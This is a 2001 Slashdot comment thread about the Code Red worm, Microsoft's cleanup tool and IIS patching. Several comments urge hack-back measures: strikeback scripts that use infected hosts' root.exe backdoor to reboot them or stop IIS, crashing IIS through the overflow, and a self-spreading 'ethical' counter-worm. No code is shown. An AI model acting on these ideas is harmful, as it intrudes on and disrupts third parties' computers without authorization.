OK, who can write a perl CGI script that will, on connection from an infected host, send the appropriate commands to root.exe; download the tool; and run it?
For extra credit: reboot twice, as Micro$oft recommends.
For a straight A: fix the problem forever by replacing NT with Linux...

Re:Next step: automate it!

[thing12]

That's almost what the link at the end of the story does. It does everything but patch the infected host. It would be funny as hell to just disable IIS on every infected box that connects to yours.

Re:Next step: automate it!

[IronChef]

It would be nice to alter the last one to point to a page that says, "Hey Chester, you've been compromised, and your computer has been attacking mine lately. Install this patch or turn off the web server, you chucklehead."

Re:Next step: automate it!

my dog had worms, but I brought it to the vet. Maybe people should do that with Microsoft. Get rid of those nastily worms.

Re:FUD ALERT

[analog_line]

You can't because you are a paid basher talking out of your ass.

Oh gods, someone PLEASE tell me how I could get a job bashing Microsoft. I do it for free all the time.

And here's a security hole for you. Service Pack 6 (that's the original Service Pack 6, not 6a) not allowing anyone but Administrators to access the TCP/IP stack. You think that possibly some of Microsoft's vaunted legions of crack QA people might've possibly tried testing the service pack as something other than an Administrator?

If you're concerned become a vigilante

[gad_zuki!]

There a nice fake webserver you can run on unix or windows platforms that launches a warning html page on the attacker's machine. Why let the "authorities" run the net, especially when the code red attackers are asking you for default.ida - whatever you make that to be.

Link:

http://www.dynwebdev.com/codered/

Gotcha!!!

Well now, they probably figured that anybody dense enough to run NT or Win 2K, out of the box, would be dense enough to click on the link! Do you double-click on every e-mail attachment too?

Has it never occurred to you that you may be too dense to run Windows? One thing that Code Red has taught is that it really is difficult to run Windows, at least, without looking like a gibbering fool.

Stop complaining about Microsoft's security holes.

Are you running Sendmail? Maybe an old version which came with your old CD? You shouldn't be blaming Microsoft for anything.

Re:Anybody who thinks...

Oh no. 132 probes in a 24 hour period from dial ups!

Sounds like a big immergency!

I'm suprised you can even get online to post this!

Re:Not the mess they made...

[sheldon]

Just a correction... Apache does *NOT* run MUCH more of the web than does IIS.

You just have to go look at the Netcraft survey's to understand. In the past they've pointed out that half of SSL enabled sites run IIS. Then about a month or two ago they started trying to identify individual machines and found IIS/Windows combination again on half of the overall web.

What we do know is that Apache is used in many more cohosting situations. Jimmy and Susy set up a web page and pay $0-10/month for it. Is it a signifigant thing that companies providing low price service with no service level agreements use a free OS/web server? I don't think so, but you be the judge.

Two other points:

Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

You should *ALWAYS* test patches and new releases before installing them into a production environment. That applies not only to Microsoft, but also to Linux, Sun, HP, Oracle, Peoplesoft, everything!

In our testing service packs don't usually break apps. But they do have a tendency to break drivers or low-level hardware monitoring tools provided by the manufacturer. Is this surprising? No. Again we have the same problems on our Unix servers with OS patches.

Re:Not the mess they made...

[Nater]

His point is that the patch was avaialble and public BEFORE code red.

I understand what his point was. And yes, I understand commercial software schedules and the need to ship code (I am a corporate cog by day). I understand that under the circumstances, Microsoft has done all they can. However, the statement that "Microsoft fixed the problem before it was a problem" is still wrong. The statement "Microsoft fixed the problem before it showed any symptoms" is accurate.

You people

I hope you're not trying to make a generalization about any particular group, because it would be just as easy to make generalizations about the complement to that group. And I certainly hope you're not trying to fit me into a pidgeonhole on account of a single comment on a particular website.

Script doesn't work anyways

[Dahan]

Looks like this one works. Just done it on my own machine. Can anyone confirm that it really does, please?

Works in what way? If you mean it sends the HTTP request, then yeah, that probably does work. But it's not gonna shut down IIS.

I just tried copying cmd.exe to the scripts directory on an IIS box and sent a query for it to do an iisreset /stop and I get an Access denied error. I don't think the IUSR_ account has permission to stop services.

Maybe what'd work is to take advantage of the buffer overflow and just send a bunch of junk to make IIS crash, instead of attempting a clean shutdown.

Re:Not the mess they made...

[Master+Bait]

This deserves a -1,Retard.

Hold your horses there, Redmond Breath!

Any competant IT admin who uses Windows is probably frustrated and angry. Why don't you that those skills and get a GOOD job...

Re:Not the mess they made...

[Fishstick]

It is worse than that, actually.

Here, all of the W2K workstation boxes were infected. These are not sysadmins or developers who should know better, these are just all the people who work here and are provided with a workstation to do their jobs and have no idea that IIS is running on their machines.

They have no idea and weren't ever told that they need to apply any patches. Couple days after the CR panic started to spread, we got an alert from our crack security administration group that we should download and install a patch from Microsoft if we were running any NT servers.

Of course, none of them new what the hell this meant, so they assumed it didn't apply to them and so did nothing.

Sheesh, what a mess!

Re:Not the mess they made...

[knorthern+knight]

> I mean at some point not everyone in the
> world can be a computer expert,

A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747's be made so easy to fly that every office worker could do it ?

> so are you recommending that people that
> aren't shouldn't have a computer?

If they are not willing/able to bring themselves up to the necessary level of competence to run general-purpose computers, yes. Give me a manually operated medium-format or 35 mm SLR camera, and I'm just as helpless as a Mac or Windows user at a unix commandline. If it ain't point-and-click, I'm totally lost. That doesn't mean I'm stupid; just that I'm not competent to use a particular tool.

> There wouldn't be a computer industry if it
> weren't for the "stupid" people needing
> computers to help out thier jobs and lives.
> What we need to do is constructively help make
> the experience good and safe for everyone.

That's where WEB-TV are aiming at. They are to the general-purpose computer what the point-n-click camera is to professional equipment. The great majority of people aren't geeks. That's not disparagement; merely admitting that Joe Average is no more competent to operate a general purpose computer than I am to manually operate a medium-format camera. It's not an admission of stupidity, just an acknowledgement that different people have different competencies.

Re:Not the mess they made...

[jeffy124]

On top of that, the admins who missed repeated pleas from both Microsoft and Government officials urging them to install the patch, not to mention all the publicity the pleas and the virus made on CNN (both the website and on TV), other major national news networks, and even my local (Washington DC area) television news stations.

The $64K question: Does it actually work?

[NReitzel]

I'm glad to see someone at Microsoft stepping up to the plate, so to speak, to try and provide a comprehensible tool for nonprofessional users of their products. I am actually a little surprized that they released such a product at all, on the theory that their lawyers must have warned them that by releasing a cleanup tool, they have perforce admitted to having a problem in the first place. Kudos to Microsoft, who (for once) have placed the quality of their product ahead of the veracity of their legal department.

So...

So they are now distributing copies of FreeBSD or fdisk?

Re:Not the mess they made...

[uchian]

I know how completely absurd it is to assume that because someone is using Windows, they have no computer savvy.

This is possibly off topic, but I will say that I've been using various windows versions since Windows 95 came out (admittedly Windows NT/2000 only as a user, never with sysadmin access), and I still don't know exactly where different things are stored in the registry, how I could figure out what is wrong and fix it manually if the need ever arises (normally every six months or so with Windows 98).

I've been using Linux for about 6 months and have a pretty good idea how to do all of the above. Why? Because by nannying the user through everything, the user never _learns_ anything about Windows. Even now, any advice I ever heard about questions about Windows start "Um, have you tried rebooting?, no that didn't help? Try reinstalling it then..." and quite often gets no further.

Perhaps I simply have not found the correct information sources that you have, in which case I would appreciate hearing about them. If they mention the use of Wizards, they don't count:-)

Strikeback script

[vla1den]

Please note this Code Red Strikeback script. If you can, install it! Don't forget to add default.txt with it, so other can download it from you too.

This is good thing.

Yeah, and BTW, if somebody will rewrite it in PHP it'll be good too: I can not put executable cgi in my www directory...

Wow, what a tool

[absurd_spork]

What a great tool that removes a couple of predefined files and reboots a system, nothing an admin couldn't have done himself in three minutes.

I hope it's Microsoft-certified to work, at least.

And disabling your web server as an option to keep your web server free from infection is so ingenious that I completely lack the words to describe the ingenuity behind it.

Anybody who thinks...

[talks_to_birds]

...this is at the "mopping-up" stage is nuts.

08/10/01 I received a total of 132 probes to tcp:80 on my 12.82.x.x dynamic IP via my dialup to worldnet.att.net

These are exclusively from other dialups and small-scale hosts in AT&T's 12.x.x.x class A; AT&T has introduced ingress filtering and I'm seeing almost nothing from outside (Note: almost - some stuff is still leaking through..)

But the problem is the enemy within: there's got to be thousands of home/SOHO small systems, maybe single boxes, put together by the hotshot early-adopters and techno-yuppies who think it's cool to go through the checkout stand at CompUSA and purchase a copy of Win 2K Professional, or whatever, and put it on their home systems with all the bells and whistles installed.

None of these boxes are under *any* formal administrative control, and it's going to be up to each and every one of these thousands of techno-yuppies to patch each and every single one of their boxes.

So far today 08/11/01 at 10:00am I've had 69 probes.

As far as I can see, getting all these systems disinfected and patched hasn't even started yet.

t_t_b

This script has potential

[myov]

I had 11 connection attempts within a 1/2h of installing this script. While it's easy to reboot the remote box (and laugh), couldn't this script do something a little more useful, like display a warning message to the user that they are infected?

Re:Not the mess they made...

[Digitalia]

"And, so many MS service packs BREAK servers and software when installed, can you also not blame people for NOT rushing ot install them?"

Yes. They decided that they knew more than those who discovered the exploit and consciously decided, "I know more than they do; there is no risk," or "It's just another stupid worm. No big deal."

It was either hubris or negligence. Both are things that shouldn't be excused.

MS Tool

[mellonhead]

I'm amazed they aren't charging for it...

Permanently disable IIS??????

[very]

Isn't it called "UNINSTALL"? Maybe next time Microsoft will tell people not to install IIS in the first place.

A (partial) solution?

[SpookyFish]

Ok, some enterprising and ethical hacker out there needs to make a new version of Code Red (Version -1?) that exploits the hole, puts a message somewhere obvious with a link to a web site for more info, disables the hole and runs for a few days spreading around like the other variants, then then disables itself.

Wouldn't that make a nice dent?

Re:A (partial) solution?

Here you go

Zodiac

[Amphigory]

(SPOILER WARNING)

Anybody ever read Zodiac, by the always-popular Neil Stephenson? Short plot: the bad guys are dumping PCB's in Boston Harbor. They invent a genetically engineered bacteria to eat all the PCB's. They also invent one to make PCB's along the way, which accidentally gets loose and threatens to destroy the planet.

I wonder how long it's going to be before some good-hearted, but slightly insane, person writes a Virus to close security holes in Windows? Then what happens when it trashes every version other than Windows 95 OEMSR3.1 (or whatever -- I don't run windows.) Would Microsoft do such a thing to cover up their mistakes? Would we ever know if they did?

Incidentally, In my more evil moments, I had thought that a virus to change everyone's default web browser to Netscape would be kind of poetic justic. Let me say, up front, that I would not write one and am not advocating that anyone else does so. But it would be an interesting use of the sircam code.

Damn.. I gave them the idea!

[Mazzella!]

The Old SSI version was my doing ;) Check out the archives of the Las Vegas LUG for a better explination of what I did with the SSI.

Re:Warhol Worm proposed: 15 minutes to total infec

[Phork]

well, not really, the IPv6 address space will be largley unused. but the areas that are used will be well known, it would be very easy to specify the good ranges to scan.

quit sendin me scat

[blendin]

quit sendin me scat

the script provided for Apache users

[evildead]

Ummm... from a somewhat pendantic point of view, its a denial of service attack against the machine in question. Whether or not such 'black ICE' measures are ethical is a long drawn out question; but as to their legality -- I would say no.

The real reason to blame Microsoft

[daviddennis]

Microsoft marketing says:

"You're a trained monkey. You too can run a web server! Just blow $1,000 on our systems and you're all set."

THe person who believed Microsoft when they said that is partially to blame, surely, but in the beginning it's Microsoft that has to take the hit for overpromising and underdelivering. If you promise a secure product anyone can use, well, you're on the hook if you don't supply one.

D

Re:Not the mess they made...

[FunkyRat]

While I agree with you that it is elitist to think that one should have to be a computer expert in order to use a computer to do their everyday job, just as it is ridiculous to think that everyone who drives a car should be an auto mechanic. However, if you drive a car you are expected to know some basic things such as to check your oil frequently, to have your oil replaced every 3,000 miles or so, make sure there is enough air in your tires, etc. Otherwise you run the risk of at the least expensively damageing your vehicle, at the most putting yourself in a life threatening situation. Similarly, one should have some basic knowledge about their computer, operating system, applications and a little general knowledge about things like basic security.

Yeah, here on Slashdot we all probably do come down too hard on Microsoft for the quality of their products. I can't believe that MS deliberately releases bug ridden software full of security holes, and I think one has to admit that quite a few of their products are really very good.

On the other hand, MS support is horrible. Heck, they don't even offer any kind of useful free support if your copy of Windows was purchased from an OEM (preinstalled on your computer when you bought it). There may be a lot of people in the Linux community who will shout RTFM when asked a question by a newbie, but in general you will find that most people in the community are genuinely helpful and supportive of those with less than expert knowledge.

Blame people that ENCOURAGE this...

[Svartalf]

Microsoft's whole philosophy and marketing is that "it's easy to do" and tha "anybody can do it".

Applying patches isn't always easy- sometimes you've got to do it often.

System security isn't easy- ever.

Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.

I blame them not because they're big- I blame them because they fostered this BS in the first place!

Since when?

[ZxCv]

IIS is NOT part of the default install for Win2k Pro. Whoever told you that is wrong and if it was installed when you booted the box for the first time, it was because whoever built your box put it there.

One Question?

Couldn't This all Be solved with a Automatic Update or New Version alert like they are sticking in all their other software?

Re:Not the mess they made...

[kurt555gs]

some one on /. has this in their tag line "An MSCE is to computing whata a McDonalds Certified Food Specialist is to fine cusine" If some one really had any computer savy ... they would be using *NIX . (period)

Re:The $64K question: Does it actually work?

[rambot]

Microsoft needs to get the hell away from the plate. Thats the real problem. They have failed us with IIS over and over again. Hackable bloatware at its finest. Ignorance is not an excuse! I think you know what I mean.

Re:Not the mess they made...

[SilentChris]

Actually, it was the mess the hackers created.

Speaking of Microsoft...

[brainthought]

Anyone catch the new anti-clippy (the paperclip Office assistant) site over at Microsoft? Never seen them turn on one of their own like that...

The video...

[MyAss]

What format is the video in? I get nothing in linux and my friend said it only worked for him in IE and not in Netscape in Windows.

Re:Not the mess they made...

[rprycem]

Mod this guy up high... That was one of the best things I have ever seen. That IBM guy has some balls :-p

How about modifying thr routers

[SnarfQuest]

How about changing the router stack on the Linux/BSD boxes to automatically drop all of the CodeRed connection attempts. That would potentially reduce the load this virus is generating, and maybe then my DSL modem won't crash as often.

What if

[ArchieBunker]

The tables were turned? You had millions of redhat 6.0 boxes all running the default install with no patches or security measures applied. I have seen plenty of upatched unix boxes so its not only MS people. If the statistics were different would you blame redhat for making an insecure product, or the clueless users?

Not the mess they made...

[shagoth]

It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins.

Re:Not the mess they made...

[Frater+219]

Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

When my favorite open-source project discovers a security hole, it releases the patch in such a way that you can install it with a single command. Microsoft has an equivalent to this -- it's the "Critical Updates" section of the "Windows Update" facility. They frequently put important security and bug-fix patches in this section, so that Windows users can easily access them. This also makes it easy for site IT staff to encourage users to keep their systems up to date.

The default.ida patch, a fix for a root-level compromise, was not placed in Critical Updates. Without either searching the site or being told of the correct URL to download the patch, users could not find it. People who used Windows Update religiously in the expectation of keeping their systems up to date were screwed. Sites which instructed their users that setting Windows Update to perform automatic updates would help keep them secure were screwed.

Once again, Microsoft created an expectation and failed to live up to it.

test, please ignore

testing linking

Getting the default.ida working v2.0

[Dwaine+Garden]

Nope... I just get permission problem when I access
the page. Ummmmm... I have read all the messages and the additions to the config file are in there.

I'm using apache v2.0+. Is there anything special that I'm missing. And yes, I check the permission on the htdocs directory and the default.ida file.

ooohhh man......

help...

Thanks...